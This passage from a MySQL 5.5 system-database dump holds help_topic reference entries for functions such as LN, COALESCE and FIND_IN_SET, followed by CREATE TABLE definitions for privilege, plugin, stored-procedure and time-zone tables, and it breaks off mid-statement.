PROCESSLIST,\nalthough there might be some minor differences in interpretion for the\ntwo statements for some status values (see\nhttp://dev.mysql.com/doc/refman/5.5/en/thread-information.html).\n\nOptional type values may be specified to display specific additional\ntypes of information:\n\no ALL displays all information\n\no BLOCK IO displays counts for block input and output operations\n\no CONTEXT SWITCHES displays counts for voluntary and involuntary\n context switches\n\no CPU displays user and system CPU usage times\n\no IPC displays counts for messages sent and received\n\no MEMORY is not currently implemented\n\no PAGE FAULTS displays counts for major and minor page faults\n\no SOURCE displays the names of functions from the source code, together\n with the name and line number of the file in which the function\n occurs\n\no SWAPS displays swap counts\n\nProfiling is enabled per session. When a session ends, its profiling\ninformation is lost.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-profile.html\n\n','mysql> SELECT @@profiling;\n+-------------+\n| @@profiling |\n+-------------+\n| 0 |\n+-------------+\n1 row in set (0.00 sec)\n\nmysql> SET profiling = 1;\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> DROP TABLE IF EXISTS t1;\nQuery OK, 0 rows affected, 1 warning (0.00 sec)\n\nmysql> CREATE TABLE T1 (id INT);\nQuery OK, 0 rows affected (0.01 sec)\n\nmysql> SHOW PROFILES;\n+----------+----------+--------------------------+\n| Query_ID | Duration | Query |\n+----------+----------+--------------------------+\n| 0 | 0.000088 | SET PROFILING = 1 |\n| 1 | 0.000136 | DROP TABLE IF EXISTS t1 |\n| 2 | 0.011947 | CREATE TABLE t1 (id INT) |\n+----------+----------+--------------------------+\n3 rows in set (0.00 sec)\n\nmysql> SHOW PROFILE;\n+----------------------+----------+\n| Status | Duration |\n+----------------------+----------+\n| checking permissions | 0.000040 |\n| creating table | 0.000056 |\n| After create | 0.011363 |\n| query end | 0.000375 |\n| freeing items | 0.000089 |\n| logging slow query | 0.000019 |\n| cleaning up | 0.000005 |\n+----------------------+----------+\n7 rows in set (0.00 sec)\n\nmysql> SHOW PROFILE FOR QUERY 1;\n+--------------------+----------+\n| Status | Duration |\n+--------------------+----------+\n| query end | 0.000107 |\n| freeing items | 0.000008 |\n| logging slow query | 0.000015 |\n| cleaning up | 0.000006 |\n+--------------------+----------+\n4 rows in set (0.00 sec)\n\nmysql> SHOW PROFILE CPU FOR QUERY 2;\n+----------------------+----------+----------+------------+\n| Status | Duration | CPU_user | CPU_system |\n+----------------------+----------+----------+------------+\n| checking permissions | 0.000040 | 0.000038 | 0.000002 |\n| creating table | 0.000056 | 0.000028 | 0.000028 |\n| After create | 0.011363 | 0.000217 | 0.001571 |\n| query end | 0.000375 | 0.000013 | 0.000028 |\n| freeing items | 0.000089 | 0.000010 | 0.000014 |\n| logging slow query | 0.000019 | 0.000009 | 0.000010 |\n| cleaning up | 0.000005 | 0.000003 | 0.000002 |\n+----------------------+----------+----------+------------+\n7 rows in set (0.00 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/show-profile.html'),(491,'SHOW PROCEDURE CODE',27,'Syntax:\nSHOW PROCEDURE CODE proc_name\n\nThis statement is a MySQL extension that is available only for servers\nthat have been built with debugging support. It displays a\nrepresentation of the internal implementation of the named stored\nprocedure. A similar statement, SHOW FUNCTION CODE, displays\ninformation about stored functions (see [HELP SHOW FUNCTION CODE]).\n\nTo use either statement, you must be the owner of the routine or have\nSELECT access to the mysql.proc table.\n\nIf the named routine is available, each statement produces a result\nset. Each row in the result set corresponds to one \"instruction\" in the\nroutine. The first column is Pos, which is an ordinal number beginning\nwith 0. The second column is Instruction, which contains an SQL\nstatement (usually changed from the original source), or a directive\nwhich has meaning only to the stored-routine handler.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-procedure-code.html\n\n','mysql> DELIMITER //\nmysql> CREATE PROCEDURE p1 ()\n -> BEGIN\n -> DECLARE fanta INT DEFAULT 55;\n -> DROP TABLE t2;\n -> LOOP\n -> INSERT INTO t3 VALUES (fanta);\n -> END LOOP;\n -> END//\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SHOW PROCEDURE CODE p1//\n+-----+----------------------------------------+\n| Pos | Instruction |\n+-----+----------------------------------------+\n| 0 | set fanta@0 55 |\n| 1 | stmt 9 \"DROP TABLE t2\" |\n| 2 | stmt 5 \"INSERT INTO t3 VALUES (fanta)\" |\n| 3 | jump 2 |\n+-----+----------------------------------------+\n4 rows in set (0.00 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/show-procedure-code.html'),(492,'MEDIUMTEXT',23,'MEDIUMTEXT [CHARACTER SET charset_name] [COLLATE collation_name]\n\nA TEXT column with a maximum length of 16,777,215 (224 − 1)\ncharacters. The effective maximum length is less if the value contains\nmultibyte characters. Each MEDIUMTEXT value is stored using a 3-byte\nlength prefix that indicates the number of bytes in the value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(493,'LN',3,'Syntax:\nLN(X)\n\nReturns the natural logarithm of X; that is, the base-e logarithm of X.\nIf X is less than or equal to 0, then NULL is returned.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT LN(2);\n -> 0.69314718055995\nmysql> SELECT LN(-2);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(494,'RETURN',24,'Syntax:\nRETURN expr\n\nThe RETURN statement terminates execution of a stored function and\nreturns the value expr to the function caller. There must be at least\none RETURN statement in a stored function. There may be more than one\nif the function has multiple exit points.\n\nThis statement is not used in stored procedures, triggers, or events.\nThe LEAVE statement can be used to exit a stored program of those\ntypes.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/return.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/return.html'),(495,'SHOW COLLATION',27,'Syntax:\nSHOW COLLATION\n [LIKE \'pattern\' | WHERE expr]\n\nThis statement lists collations supported by the server. By default,\nthe output from SHOW COLLATION includes all available collations. The\nLIKE clause, if present, indicates which collation names to match. The\nWHERE clause can be given to select rows using more general conditions,\nas discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html. For example:\n\nmysql> SHOW COLLATION LIKE \'latin1%\';\n+-------------------+---------+----+---------+----------+---------+\n| Collation | Charset | Id | Default | Compiled | Sortlen |\n+-------------------+---------+----+---------+----------+---------+\n| latin1_german1_ci | latin1 | 5 | | | 0 |\n| latin1_swedish_ci | latin1 | 8 | Yes | Yes | 0 |\n| latin1_danish_ci | latin1 | 15 | | | 0 |\n| latin1_german2_ci | latin1 | 31 | | Yes | 2 |\n| latin1_bin | latin1 | 47 | | Yes | 0 |\n| latin1_general_ci | latin1 | 48 | | | 0 |\n| latin1_general_cs | latin1 | 49 | | | 0 |\n| latin1_spanish_ci | latin1 | 94 | | | 0 |\n+-------------------+---------+----+---------+----------+---------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-collation.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-collation.html'),(496,'LOG',3,'Syntax:\nLOG(X), LOG(B,X)\n\nIf called with one parameter, this function returns the natural\nlogarithm of X. If X is less than or equal to 0, then NULL is returned.\n\nThe inverse of this function (when called with a single argument) is\nthe EXP() function.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT LOG(2);\n -> 0.69314718055995\nmysql> SELECT LOG(-2);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(497,'SET SQL_LOG_BIN',8,'Syntax:\nSET sql_log_bin = {0|1}\n\nThe sql_log_bin variable controls whether logging to the binary log is\ndone. The default value is 1 (do logging). To change logging for the\ncurrent session, change the session value of this variable. The session\nuser must have the SUPER privilege to set this variable. Set this\nvariable to 0 for a session to temporarily disable binary logging while\nmaking changes to the master which you do not want to replicate to the\nslave.\n\nAs of MySQL 5.5, sql_log_bin can be set as a global or session\nvariable. Setting sql_log_bin globally is only detected when a new\nsession is started. Any sessions previously running are not impacted\nwhen setting sql_log_bin globally.\n\n*Warning*: Incorrect use of sql_log_bin with a global scope means any\nchanges made in an already running session are still being recorded to\nthe binary log and therefore replicated. Exercise extreme caution using\nsql_log_bin with a global scope as the above situation could cause\nunexpected results including replication failure.\n\nBeginning with MySQL 5.5.5, it is no longer possible to set\n@@session.sql_log_bin within a transaction or subquery. (Bug #53437)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/set-sql-log-bin.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/set-sql-log-bin.html'),(498,'!=',20,'Syntax:\n<>, !=\n\nNot equal:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT \'.01\' <> \'0.01\';\n -> 1\nmysql> SELECT .01 <> \'0.01\';\n -> 0\nmysql> SELECT \'zapp\' <> \'zappp\';\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(499,'WHILE',24,'Syntax:\n[begin_label:] WHILE search_condition DO\n statement_list\nEND WHILE [end_label]\n\nThe statement list within a WHILE statement is repeated as long as the\nsearch_condition expression is true. statement_list consists of one or\nmore SQL statements, each terminated by a semicolon (;) statement\ndelimiter.\n\nA WHILE statement can be labeled. For the rules regarding label use,\nsee [HELP labels].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/while.html\n\n','CREATE PROCEDURE dowhile()\nBEGIN\n DECLARE v1 INT DEFAULT 5;\n\n WHILE v1 > 0 DO\n ...\n SET v1 = v1 - 1;\n END WHILE;\nEND;\n','http://dev.mysql.com/doc/refman/5.5/en/while.html'),(500,'AES_DECRYPT',12,'Syntax:\nAES_DECRYPT(crypt_str,key_str)\n\nThis function decrypts data using the official AES (Advanced Encryption\nStandard) algorithm. For more information, see the description of\nAES_ENCRYPT().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(501,'DAYNAME',32,'Syntax:\nDAYNAME(date)\n\nReturns the name of the weekday for date. The language used for the\nname is controlled by the value of the lc_time_names system variable\n(http://dev.mysql.com/doc/refman/5.5/en/locale-support.html).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DAYNAME(\'2007-02-03\');\n -> \'Saturday\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(502,'COERCIBILITY',17,'Syntax:\nCOERCIBILITY(str)\n\nReturns the collation coercibility value of the string argument.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT COERCIBILITY(\'abc\' COLLATE latin1_swedish_ci);\n -> 0\nmysql> SELECT COERCIBILITY(USER());\n -> 3\nmysql> SELECT COERCIBILITY(\'abc\');\n -> 4\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(503,'INT',23,'INT[(M)] [UNSIGNED] [ZEROFILL]\n\nA normal-size integer. The signed range is -2147483648 to 2147483647.\nThe unsigned range is 0 to 4294967295.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(504,'GLENGTH',13,'GLength(ls)\n\nReturns a double-precision number indicating the length of the\nLineString or MultiLineString value ls in its associated spatial\nreference. The length of a MultiLineString value is equal to the sum of\nthe lengths of its elements.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html\n\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT GLength(GeomFromText(@ls));\n+----------------------------+\n| GLength(GeomFromText(@ls)) |\n+----------------------------+\n| 2.8284271247461903 |\n+----------------------------+\n\nmysql> SET @mls = \'MultiLineString((1 1,2 2,3 3),(4 4,5 5))\';\nmysql> SELECT GLength(GeomFromText(@mls));\n+-----------------------------+\n| GLength(GeomFromText(@mls)) |\n+-----------------------------+\n| 4.242640687119286 |\n+-----------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html'),(505,'COLLATION',17,'Syntax:\nCOLLATION(str)\n\nReturns the collation of the string argument.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT COLLATION(\'abc\');\n -> \'latin1_swedish_ci\'\nmysql> SELECT COLLATION(_utf8\'abc\');\n -> \'utf8_general_ci\'\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(506,'RADIANS',3,'Syntax:\nRADIANS(X)\n\nReturns the argument X, converted from degrees to radians. (Note that\nπ radians equals 180 degrees.)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT RADIANS(90);\n -> 1.5707963267949\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(507,'COALESCE',20,'Syntax:\nCOALESCE(value,...)\n\nReturns the first non-NULL value in the list, or NULL if there are no\nnon-NULL values.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT COALESCE(NULL,1);\n -> 1\nmysql> SELECT COALESCE(NULL,NULL,NULL);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(508,'VERSION',17,'Syntax:\nVERSION()\n\nReturns a string that indicates the MySQL server version. The string\nuses the utf8 character set. The value might have a suffix in addition\nto the version number. See the description of the version system\nvariable in\nhttp://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT VERSION();\n -> \'5.5.47-standard\'\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(509,'MAKE_SET',38,'Syntax:\nMAKE_SET(bits,str1,str2,...)\n\nReturns a set value (a string containing substrings separated by \",\"\ncharacters) consisting of the strings that have the corresponding bit\nin bits set. str1 corresponds to bit 0, str2 to bit 1, and so on. NULL\nvalues in str1, str2, ... are not appended to the result.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT MAKE_SET(1,\'a\',\'b\',\'c\');\n -> \'a\'\nmysql> SELECT MAKE_SET(1 | 4,\'hello\',\'nice\',\'world\');\n -> \'hello,world\'\nmysql> SELECT MAKE_SET(1 | 4,\'hello\',\'nice\',NULL,\'world\');\n -> \'hello\'\nmysql> SELECT MAKE_SET(0,\'a\',\'b\',\'c\');\n -> \'\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(510,'FIND_IN_SET',38,'Syntax:\nFIND_IN_SET(str,strlist)\n\nReturns a value in the range of 1 to N if the string str is in the\nstring list strlist consisting of N substrings. A string list is a\nstring composed of substrings separated by \",\" characters. If the first\nargument is a constant string and the second is a column of type SET,\nthe FIND_IN_SET() function is optimized to use bit arithmetic. Returns\n0 if str is not in strlist or if strlist is the empty string. Returns\nNULL if either argument is NULL. This function does not work properly\nif the first argument contains a comma (\",\") character.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT FIND_IN_SET(\'b\',\'a,b,c,d\');\n -> 2\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'); /*!40000 ALTER TABLE `help_topic` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `host` -- DROP TABLE IF EXISTS `host`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `host` ( `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `Db` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `Select_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Insert_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Update_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Delete_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Drop_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Grant_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `References_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Index_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Alter_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_tmp_table_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Lock_tables_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Show_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Alter_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Execute_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Trigger_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', PRIMARY KEY (`Host`,`Db`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Host privileges; Merged with database privileges'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `host` -- LOCK TABLES `host` WRITE; /*!40000 ALTER TABLE `host` DISABLE KEYS */; /*!40000 ALTER TABLE `host` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `ndb_binlog_index` -- DROP TABLE IF EXISTS `ndb_binlog_index`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `ndb_binlog_index` ( `Position` bigint(20) unsigned NOT NULL, `File` varchar(255) NOT NULL, `epoch` bigint(20) unsigned NOT NULL, `inserts` bigint(20) unsigned NOT NULL, `updates` bigint(20) unsigned NOT NULL, `deletes` bigint(20) unsigned NOT NULL, `schemaops` bigint(20) unsigned NOT NULL, PRIMARY KEY (`epoch`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `ndb_binlog_index` -- LOCK TABLES `ndb_binlog_index` WRITE; /*!40000 ALTER TABLE `ndb_binlog_index` DISABLE KEYS */; /*!40000 ALTER TABLE `ndb_binlog_index` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `plugin` -- DROP TABLE IF EXISTS `plugin`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `plugin` ( `name` varchar(64) NOT NULL DEFAULT '', `dl` varchar(128) NOT NULL DEFAULT '', PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='MySQL plugins'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `plugin` -- LOCK TABLES `plugin` WRITE; /*!40000 ALTER TABLE `plugin` DISABLE KEYS */; /*!40000 ALTER TABLE `plugin` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `proc` -- DROP TABLE IF EXISTS `proc`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `proc` ( `db` char(64) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `name` char(64) NOT NULL DEFAULT '', `type` enum('FUNCTION','PROCEDURE') NOT NULL, `specific_name` char(64) NOT NULL DEFAULT '', `language` enum('SQL') NOT NULL DEFAULT 'SQL', `sql_data_access` enum('CONTAINS_SQL','NO_SQL','READS_SQL_DATA','MODIFIES_SQL_DATA') NOT NULL DEFAULT 'CONTAINS_SQL', `is_deterministic` enum('YES','NO') NOT NULL DEFAULT 'NO', `security_type` enum('INVOKER','DEFINER') NOT NULL DEFAULT 'DEFINER', `param_list` blob NOT NULL, `returns` longblob NOT NULL, `body` longblob NOT NULL, `definer` char(77) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `modified` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00', `sql_mode` set('REAL_AS_FLOAT','PIPES_AS_CONCAT','ANSI_QUOTES','IGNORE_SPACE','NOT_USED','ONLY_FULL_GROUP_BY','NO_UNSIGNED_SUBTRACTION','NO_DIR_IN_CREATE','POSTGRESQL','ORACLE','MSSQL','DB2','MAXDB','NO_KEY_OPTIONS','NO_TABLE_OPTIONS','NO_FIELD_OPTIONS','MYSQL323','MYSQL40','ANSI','NO_AUTO_VALUE_ON_ZERO','NO_BACKSLASH_ESCAPES','STRICT_TRANS_TABLES','STRICT_ALL_TABLES','NO_ZERO_IN_DATE','NO_ZERO_DATE','INVALID_DATES','ERROR_FOR_DIVISION_BY_ZERO','TRADITIONAL','NO_AUTO_CREATE_USER','HIGH_NOT_PRECEDENCE','NO_ENGINE_SUBSTITUTION','PAD_CHAR_TO_FULL_LENGTH') NOT NULL DEFAULT '', `comment` text CHARACTER SET utf8 COLLATE utf8_bin NOT NULL, `character_set_client` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL, `collation_connection` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL, `db_collation` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL, `body_utf8` longblob, PRIMARY KEY (`db`,`name`,`type`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Stored Procedures'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `proc` -- LOCK TABLES `proc` WRITE; /*!40000 ALTER TABLE `proc` DISABLE KEYS */; /*!40000 ALTER TABLE `proc` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `procs_priv` -- DROP TABLE IF EXISTS `procs_priv`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `procs_priv` ( `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `Db` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '', `Routine_name` char(64) CHARACTER SET utf8 NOT NULL DEFAULT '', `Routine_type` enum('FUNCTION','PROCEDURE') COLLATE utf8_bin NOT NULL, `Grantor` char(77) COLLATE utf8_bin NOT NULL DEFAULT '', `Proc_priv` set('Execute','Alter Routine','Grant') CHARACTER SET utf8 NOT NULL DEFAULT '', `Timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, PRIMARY KEY (`Host`,`Db`,`User`,`Routine_name`,`Routine_type`), KEY `Grantor` (`Grantor`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Procedure privileges'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `procs_priv` -- LOCK TABLES `procs_priv` WRITE; /*!40000 ALTER TABLE `procs_priv` DISABLE KEYS */; /*!40000 ALTER TABLE `procs_priv` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `proxies_priv` -- DROP TABLE IF EXISTS `proxies_priv`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `proxies_priv` ( `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '', `Proxied_host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `Proxied_user` char(16) COLLATE utf8_bin NOT NULL DEFAULT '', `With_grant` tinyint(1) NOT NULL DEFAULT '0', `Grantor` char(77) COLLATE utf8_bin NOT NULL DEFAULT '', `Timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, PRIMARY KEY (`Host`,`User`,`Proxied_host`,`Proxied_user`), KEY `Grantor` (`Grantor`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='User proxy privileges'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `proxies_priv` -- LOCK TABLES `proxies_priv` WRITE; /*!40000 ALTER TABLE `proxies_priv` DISABLE KEYS */; INSERT INTO `proxies_priv` VALUES ('localhost','root','','',1,'','2014-07-18 14:10:31'),('h2321533','root','','',1,'','2014-07-18 14:10:31'); /*!40000 ALTER TABLE `proxies_priv` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `servers` -- DROP TABLE IF EXISTS `servers`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `servers` ( `Server_name` char(64) NOT NULL DEFAULT '', `Host` char(64) NOT NULL DEFAULT '', `Db` char(64) NOT NULL DEFAULT '', `Username` char(64) NOT NULL DEFAULT '', `Password` char(64) NOT NULL DEFAULT '', `Port` int(4) NOT NULL DEFAULT '0', `Socket` char(64) NOT NULL DEFAULT '', `Wrapper` char(64) NOT NULL DEFAULT '', `Owner` char(64) NOT NULL DEFAULT '', PRIMARY KEY (`Server_name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='MySQL Foreign Servers table'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `servers` -- LOCK TABLES `servers` WRITE; /*!40000 ALTER TABLE `servers` DISABLE KEYS */; /*!40000 ALTER TABLE `servers` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `tables_priv` -- DROP TABLE IF EXISTS `tables_priv`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `tables_priv` ( `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `Db` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '', `Table_name` char(64) COLLATE utf8_bin NOT NULL DEFAULT '', `Grantor` char(77) COLLATE utf8_bin NOT NULL DEFAULT '', `Timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `Table_priv` set('Select','Insert','Update','Delete','Create','Drop','Grant','References','Index','Alter','Create View','Show view','Trigger') CHARACTER SET utf8 NOT NULL DEFAULT '', `Column_priv` set('Select','Insert','Update','References') CHARACTER SET utf8 NOT NULL DEFAULT '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`), KEY `Grantor` (`Grantor`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Table privileges'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `tables_priv` -- LOCK TABLES `tables_priv` WRITE; /*!40000 ALTER TABLE `tables_priv` DISABLE KEYS */; /*!40000 ALTER TABLE `tables_priv` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `time_zone` -- DROP TABLE IF EXISTS `time_zone`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `time_zone` ( `Time_zone_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `Use_leap_seconds` enum('Y','N') NOT NULL DEFAULT 'N', PRIMARY KEY (`Time_zone_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zones'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `time_zone` -- LOCK TABLES `time_zone` WRITE; /*!40000 ALTER TABLE `time_zone` DISABLE KEYS */; /*!40000 ALTER TABLE `time_zone` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `time_zone_leap_second` -- DROP TABLE IF EXISTS `time_zone_leap_second`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `time_zone_leap_second` ( `Transition_time` bigint(20) NOT NULL, `Correction` int(11) NOT NULL, PRIMARY KEY (`Transition_time`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Leap seconds information for time zones'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `time_zone_leap_second` -- LOCK TABLES `time_zone_leap_second` WRITE; /*!40000 ALTER TABLE `time_zone_leap_second` DISABLE KEYS */; /*!40000 ALTER TABLE `time_zone_leap_second` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `time_zone_name` -- DROP TABLE IF EXISTS `time_zone_name`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `time_zone_name` ( `Name` char(64) NOT NULL, `Time_zone_id` int(10) unsigned NOT NULL, PRIMARY KEY (`Name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone names'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `time_zone_name` -- LOCK TABLES `time_zone_name` WRITE; /*!40000 ALTER TABLE `time_zone_name` DISABLE KEYS */; /*!40000 ALTER TABLE `time_zone_name` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `time_zone_transition` -- DROP TABLE IF EXISTS `time_zone_transition`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `time_zone_transition` ( `Time_zone_id` int(10) unsigned NOT NULL, `Transition_time` bigint(20) NOT NULL, `Transition_type_id` int(10) unsigned NOT NULL, PRIMARY KEY (`Time_zone_id`,`Transition_time`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone transitions'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `time_zone_transition` -- LOCK TABLES `time_zone_transition` WRITE; /*!40000 ALTER TABLE `time_zone_transition` DISABLE 